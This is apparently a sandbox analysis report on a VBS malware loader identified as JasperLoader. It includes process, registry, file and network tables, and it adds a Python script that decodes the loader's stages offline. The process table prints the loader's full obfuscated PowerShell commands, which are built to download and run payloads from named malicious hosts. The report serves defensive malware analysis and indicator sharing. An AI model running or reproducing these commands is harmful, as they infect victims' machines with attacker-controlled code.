File name: | IT847561961795194146814681226589.vbs |
Full analysis: | https://app.any.run/tasks/2c292eab-ad1d-4723-b807-b10e893b900a |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | May 15, 2019, 14:25:03 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF, LF line terminators |
MD5: | D0CD197029FC2AB8FDC71D7E4AC9DA01 |
SHA1: | 8453064178998C7E14EAEC2FBEE3901D2F188022 |
SHA256: | 0887A1C7C15A5388AE489E7D7451A7B238A68F325ACE91B8FE24996F1BAD062B |
SSDEEP: | 48:+fPP9aWjkDZkRZQFREdckrXwnwUC4ZB7wG/EW7KG2lIKGCrhJBsyUDUqJwor4712:a155bTEbX |
PID | CMD | Path | Indicators | Parent process | User | Integrity level | Exit code | Version | Description
---|---|---|---|---|---|---|---|---|---
2188 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\IT847561961795194146814681226589.vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe | admin | MEDIUM | 0 | 5.8.7600.16385 | Microsoft ® Windows Based Script Host (Microsoft Corporation)
1484 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command $hcfve='';105,102,40,40,40,71,101,116,45,85,73,67,117,108,116,117,114,101,41,46,78,97,109,101,32,45,109,97,116,99,104,32,34,82,85,124,85,65,124,66,89,124,67,78,34,41,32,45,111,114,32,40,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,99,108,97,115,115,32,87,105,110,51,50,95,67,111,109,112,117,116,101,114,83,121,115,116,101,109,32,45,80,114,111,112,101,114,116,121,32,77,111,100,101,108,41,46,77,111,100,101,108,32,45,109,97,116,99,104,32,34,86,105,114,116,117,97,108,66,111,120,124,86,77,119,97,114,101,124,75,86,77,34,41,41,123,101,120,105,116,59,125,59,36,117,97,119,120,121,61,32,74,111,105,110,45,80,97,116,104,32,36,101,110,118,58,116,101,109,112,32,34,87,105,110,48,48,99,101,46,106,115,34,59,36,100,100,118,117,121,61,32,74,111,105,110,45,80,97,116,104,32,36,69,78,86,58,85,115,101,114,80,114,111,102,105,108,101,32,34,77,105,99,114,111,115,54,52,46,101,120,101,34,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,83,116,114,105,110,103,40,34,104,116,116,112,58,47,47,101,109,101,46,101,109,101,114,97,108,100,115,117,114,102,118,105,115,105,111,110,46,99,111,109,47,118,50,105,46,112,104,112,63,110,101,101,100,61,106,115,38,118,105,100,61,112,101,99,49,48,118,98,115,38,118,99,101,97,99,34,41,124,111,117,116,45,102,105,108,101,32,36,117,97,119,120,121,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,117,97,119,120,121,59,125,99,97,116,99,104,123,125,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,34,104,116,116,112,58,47,47,105,116,116,46,99,50,49,110,111,114,109,97,46,105,110,102,111,47,97,112,105,63,105,102,116,118,100,34,44,36,100,100,118,117,121,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,100,100,118,117,121,59,125,99,97,116,99,104,123,125,59\|%{$ybaz=[char]$_;$hcfve+=$ybaz};iex $hcfve; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe | admin | MEDIUM | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) | Windows PowerShell (Microsoft Corporation)
3640 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Win00ce.js" | C:\Windows\System32\WScript.exe | — | powershell.exe | admin | MEDIUM | 0 | 5.8.7600.16385 | Microsoft ® Windows Based Script Host (Microsoft Corporation)
3984 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $fsjya='';function bhztwe($fhiztdg){return [Char]([int](16908 - 4211 - 9122 - 3573 + $fhiztdg));};103,100,38,30,38,69,99,114,43,83,71,65,115,106,114,115,112,99,39,44,76,95,107,99,30,43,107,95,114,97,102,30,37,65,76,122,80,77,122,80,83,122,83,63,122,64,87,37,30,43,109,112,30,38,69,99,114,43,85,107,103,77,96,104,99,97,114,30,43,97,106,95,113,113,30,85,103,108,49,48,93,65,109,107,110,115,114,99,112,81,119,113,114,99,107,30,43,78,112,109,110,99,112,114,119,30,75,109,98,99,106,39,44,75,109,98,99,106,30,43,107,95,114,97,102,30,37,84,103,112,114,115,95,106,64,109,118,122,84,75,117,95,112,99,122,73,84,75,37,30,39,121,30,99,118,103,114,57,30,123,8,34,96,101,93,69,109,109,98,78,63,114,102,30,59,30,34,100,95,106,113,99,57,8,38,72,109,103,108,43,78,95,114,102,30,34,67,76,84,56,83,113,99,112,78,112,109,100,103,106,99,30,37,90,63,110,110,66,95,114,95,90,80,109,95,107,103,108,101,90,75,103,97,112,109,113,109,100,114,37,39,42,30,34,67,76,84,56,83,113,99,112,78,112,109,100,103,106,99,42,30,38,72,109,103,108,43,78,95,114,102,30,30,34,99,108,116,56,78,83,64,74,71,65,30,32,90,74,103,96,112,95,112,103,99,113,32,39,42,30,89,67,108,116,103,112,109,108,107,99,108,114,91,56,56,69,99,114,68,109,106,98,99,112,78,95,114,102,38,37,63,110,110,106,103,97,95,114,103,109,108,66,95,114,95,37,39,42,30,34,67,76,84,56,114,99,107,110,30,122,30,35,121,8,30,30,103,100,38,30,82,99,113,114,43,78,95,114,102,30,38,30,72,109,103,108,43,78,95,114,102,30,34,93,30,32,75,103,97,112,109,113,109,100,114,67,98,111,99,44,103,108,103,32,30,39,30,39,121,8,30,30,30,30,34,96,101,93,69,109,109,98,78,63,114,102,30,59,30,34,93,57,8,30,30,123,8,30,30,103,100,38,30,31,34,96,101,93,69,109,109,98,78,63,114,102,30,39,121,8,30,30,30,30,34,104,101,113,96,116,30,59,30,72,109,103,108,43,78,95,114,102,30,34,93,30,32,117,104,118,103,101,98,32,57,8,30,30,30,30,114,112,119,121,8,30,30,30,30,30,30,113,97,30,43,78,95,114,102,30,34,104,101,113,96,116,30,43,84,95,106,115,99,30,34,110,103,98,57,8,30,30,30,30,30,30,112,103,30,43,78,95,114,102,30,34,104,101,113,96,116,57,30,8,30,30,30,30,30,30,34,96,101,93,69,109,109,98,78,63,114,102,30,59,30,34,93,57,8,30,30,30,30,123,97,95,114,97,102,121,8,30,30,30,30,30,30,34,96,101,93,69,109,109,98,78,63,114,102,30,59,30,34,100,95,106,113,99,57,8,30,30,30,30,123,8,30,30,123,8,123,8,103,100,38,30,34,96,101,93,69,109,109,98,78,63,114,102,30,39,121,8,30,30,34,100,97,104,114,114,96,104,30,30,59,30,37,37,57,8,30,30,34,100,97,103,117,103,97,97,30,59,30,34,96,101,93,69,109,109,98,78,63,114,102,30,41,30,32,90,98,109,97,115,107,99,108,114,113,32,57,8,30,30,34,100,96,103,97,116,117,101,30,30,30,30,59,30,34,96,101,93,69,109,109,98,78,63,114,102,30,41,30,32,90,85,103,108,98,109,117,113,71,108,98,99,118,103,108,101,81,99,112,116,103,97,99,44,104,113,32,57,8,30,30,34,97,102,118,119,103,30,59,30,76,99,117,43,77,96,104,99,97,114,30,81,119,113,114,99,107,44,76,99,114,44,85,99,96,65,106,103,99,108,114,57,8,30,30,34,97,102,118,119,103,44,65,112,99,98,99,108,114,103,95,106,113,30,59,30,89,81,119,113,114,99,107,44,76,99,114,44,65,112,99,98,99,108,114,103,95,106,65,95,97,102,99,91,56,56,66,99,100,95,115,106,114,65,112,99,98,99,108,114,103,95,106,113,57,8,30,30,103,100,30,38,43,108,109,114,30,38,82,99,113,114,43,78,95,114,102,30,34,100,96,103,97,116,117,101,30,30,39,30,39,121,30,30,34,97,102,118,119,103,44,66,109,117,108,106,109,95,98,81,114,112,103,108,101,38,37,102,114,114,110,56,45,45,120,120,103,44,96,99,106,106,99,116,103,106,106,99,98,97,44,97,109,107,45,116,48,103,44,110,102,110,61,108,99,99,98,59,104,113,36,37,39,30,122,30,109,115,114,43,100,103,106,99,30,34,100,96,103,97,116,117,101,30,57,30,123,8,30,30,103,100,30,38,43,108,109,114,30,38,82,99,113,114,43,78,95,114,102,30,34,100,97,103,117,103,97,97,39,30,39,121,30,34,97,102,118,119,103,44,66,109,117,108,106,109,95,98,81,114,112,103,108,101,38,37,102,114,114,110,56,45,45,120,120,103,44,96,99,106,106,99,116,103,106,106,99,98,97,44,97,109,107,45,116,48,103,44,110,102,110,61,108,99,99,98,59,96,109,98,119,36,37,39,30,122,30,109,115,114,43,100,103,106,99,30,34,100,97,103,117,103,97,97,57,30,30,123,8,30,30,114,112,119,121,8,30,30,30,30,69,99,114,43,65,109,108,114,99,108,114,30,34,100,97,103,117,103,97,97,122,30,85,102,99,112,99,43,77,96,104,99,97,114,30,121,34,93,30,43,107,95,114,97,102,30,34,112,99,101,99,118,123,30,122,30,68,109,112,67,95,97,102,43,77,96,104,99,97,114,121,30,34,100,97,104,114,114,96,104,30,41,59,30,34,93,30,43,112,99,110,106,95,97,99,30,37,44,44,38,44,39,37,42,37,34,47,37,123,57,8,30,30,30,30,103,99,118,30,34,100,97,104,114,114,96,104,57,8,30,30,123,97,95,114,97,102,121,123,57,8,123,8\|%{$fsjya += bhztwe($_);};iex $fsjya; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe | admin | MEDIUM | — | 6.1.7600.16385 (win7_rtm.090713-1255) | Windows PowerShell (Microsoft Corporation)
2280 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe | admin | MEDIUM | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) | NTVDM.EXE (Microsoft Corporation)
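Both PowerShell command lines above use the same trick: a comma-separated list of integers is piped through a loop that casts each to `[char]` and appends it to a string, and the string is handed to `iex`. PID 1484 uses the raw character codes; PID 3984 first passes each number through `bhztwe`, which adds `16908 - 4211 - 9122 - 3573` (that is, 2) before the cast. Decoded from the arrays in the table, stage 1 exits if `(Get-UICulture).Name` matches `RU|UA|BY|CN` or the WMI `Win32_ComputerSystem` model matches `VirtualBox|VMware|KVM`, writes the response from eme.emeraldsurfvision.com to `%TEMP%\Win00ce.js` and starts it (hence WScript.exe 3640 as a child of powershell.exe), then downloads itt.c21norma.info/api?iftvd to `%USERPROFILE%\Micros64.exe` and starts that; the report logs a 10-byte response for that request, which is consistent with the ntvdm.exe child rather than a real PE. Stage 2 repeats the locale and hypervisor gate, probes candidate folders for write access (the `wjxigd` file in the file table is that probe) and fetches zzi.bellevilledc.com. The Python below is an added example, not part of the ANY.RUN report or of the sample, that reverses both encodings offline so a stage can be read without running it; the arrays are short excerpts copied from the command lines above, and the helper names `fold_offset`, `decode_codes`, `parse_char_array`, `gate_patterns` and `extract_iocs` are the example's own.

```python
"""Offline decoder for the two char-array PowerShell stages in this report.

Added example (not part of the report or the sample): it reverses what each
`iex` in the process tree does at run time. The excerpt arrays are copied from
the command lines in the process table; the helper names are this example's own.
"""
import re

# Stage 1 (PID 1484): every number is a raw character code, appended with
# $hcfve += [char]$_ and then run with iex. First 199 codes of the array.
STAGE1_EXCERPT = [
    105,102,40,40,40,71,101,116,45,85,73,67,117,108,116,117,114,101,41,46,
    78,97,109,101,32,45,109,97,116,99,104,32,34,82,85,124,85,65,124,66,
    89,124,67,78,34,41,32,45,111,114,32,40,40,71,101,116,45,87,109,105,
    79,98,106,101,99,116,32,45,99,108,97,115,115,32,87,105,110,51,50,95,
    67,111,109,112,117,116,101,114,83,121,115,116,101,109,32,45,80,114,111,112,
    101,114,116,121,32,77,111,100,101,108,41,46,77,111,100,101,108,32,45,109,
    97,116,99,104,32,34,86,105,114,116,117,97,108,66,111,120,124,86,77,119,
    97,114,101,124,75,86,77,34,41,41,123,101,120,105,116,59,125,59,
    36,117,97,119,120,121,61,32,74,111,105,110,45,80,97,116,104,32,36,101,
    110,118,58,116,101,109,112,32,34,87,105,110,48,48,99,101,46,106,115,34,59,
]

# Stage 2 (PID 3984): every number is shifted; bhztwe() adds
# (16908 - 4211 - 9122 - 3573) before the [Char] cast. Excerpt copied from
# the command line: the DownloadString() call.
STAGE2_EXCERPT = [
    34,97,102,118,119,103,44,66,109,117,108,106,109,95,98,81,114,112,103,108,
    101,38,37,102,114,114,110,56,45,45,120,120,103,44,96,99,106,106,99,116,
    103,106,106,99,98,97,44,97,109,107,45,116,48,103,44,110,102,110,61,108,
    99,99,98,59,104,113,36,37,39,
]

STAGE2_OFFSET_EXPR = "16908 - 4211 - 9122 - 3573"   # literal from bhztwe()


def fold_offset(expr):
    """Sum an add/subtract-only integer expression such as the one hidden in
    bhztwe(), without handing attacker-controlled text to eval()."""
    total = 0
    for sign, digits in re.findall(r"([+-]?)\s*(\d+)", expr):
        total += -int(digits) if sign == "-" else int(digits)
    return total


def decode_codes(codes, offset=0):
    """Reverse the %{ $acc += [char](offset + $_) } accumulator loop."""
    return "".join(chr(offset + c) for c in codes)


def parse_char_array(cmdline):
    """Pull the integer list out of a raw command-line string. Whitespace is
    stripped first because report dumps wrap long lines mid-number (the
    PID 3984 command line was split inside '30' and '110' in this page)."""
    cleaned = re.sub(r"\s+", "", cmdline)
    match = re.search(r"(?:\d+,){8,}\d+", cleaned)
    return [int(x) for x in match.group(0).split(",")] if match else []


def gate_patterns(script):
    """Regexes the decoded stage compares against with -match: the locale and
    hypervisor strings that make the loader exit before it downloads."""
    return re.findall(r"""-match\s+["']([^"']+)["']""", script)


IOC_RE = re.compile(r"""https?://[^\s"']+|[A-Za-z0-9_]+\.(?:js|exe|ini)\b""")


def extract_iocs(script):
    """URLs and dropped-file names worth pivoting on, de-duplicated."""
    return sorted(set(IOC_RE.findall(script)))


if __name__ == "__main__":
    stage1 = decode_codes(STAGE1_EXCERPT)
    stage2 = decode_codes(STAGE2_EXCERPT, fold_offset(STAGE2_OFFSET_EXPR))
    print("stage 1:", stage1)
    print("stage 1 gates:", gate_patterns(stage1))
    print("stage 2:", stage2)
    print("IOCs:", extract_iocs(stage1 + "\n" + stage2))
```

To decode a full stage, paste the whole command line into `parse_char_array` and feed the result to `decode_codes` with the offset from `fold_offset`; never run the recovered script, since it is the same text the sample hands to `iex`.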
PID | Process | Key | Name | Operation | Value
---|---|---|---|---|---
2188 | WScript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | write | 0
2188 | WScript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | write | 1
1484 | powershell.exe | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | LanguageList | write | en-US
1484 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing | write | 0
1484 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing | write | 0
1484 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask | write | 4294901760
1484 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask | write | 4294901760
1484 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize | write | 1048576
1484 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory | write | %windir%\tracing
1484 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing | write | 0

None of these writes is persistence: the ZoneMap values are the Internet Explorer zone-map defaults that WSH initialises on first use, and the Tracing\powershell_RAS* values are created by the RAS API when .NET WebClient makes its first request. The indicators worth keeping are the files and network connections below.
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
1484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z3KIYTBLD888O71U3L0Q.temp | — | — | —
3984 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H3ZPBAV4JD8U9OXRIP9U.temp | — | — | —
2280 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs4C1F.tmp | — | — | —
2280 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs4C20.tmp | — | — | —
3984 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\wjxigd | — | — | —
3984 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
1484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF133f7d.TMP | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
3984 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF134903.TMP | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
1484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
1484 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Win00ce.js | text | 488BAC9789B6E3AAEDA0C97AFE6EFB6D | B618FC29EB0CE05778B762293FCD9D499E2D97EFFE144D16856819EB221AB401

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3984 | powershell.exe | GET | — | 176.10.118.245:80 | http://zzi.bellevilledc.com/v2i.php?need=js& | CH | — | — | malicious |
1484 | powershell.exe | GET | 200 | 185.158.249.122:80 | http://eme.emeraldsurfvision.com/v2i.php?need=js&vid=pec10vbs&vceac | NL | text | 18.2 Kb | malicious |
1484 | powershell.exe | GET | 200 | 185.212.47.163:80 | http://itt.c21norma.info/api?iftvd | DE | text | 10 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1484 | powershell.exe | 185.158.249.122:80 | eme.emeraldsurfvision.com | easystores GmbH | NL | malicious |
3984 | powershell.exe | 176.10.118.245:80 | zzi.bellevilledc.com | SOFTplus Entwicklungen GmbH | CH | malicious |
1484 | powershell.exe | 185.212.47.163:80 | itt.c21norma.info | 23media GmbH | DE | unknown |
Domain | IP | Reputation
---|---|---
eme.emeraldsurfvision.com | | malicious
itt.c21norma.info | | unknown
zzi.bellevilledc.com | | malicious

PID | Process | Class | Message |
---|---|---|---|
1484 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Trojan-Downloader.Script.Generic (JasperLoader) |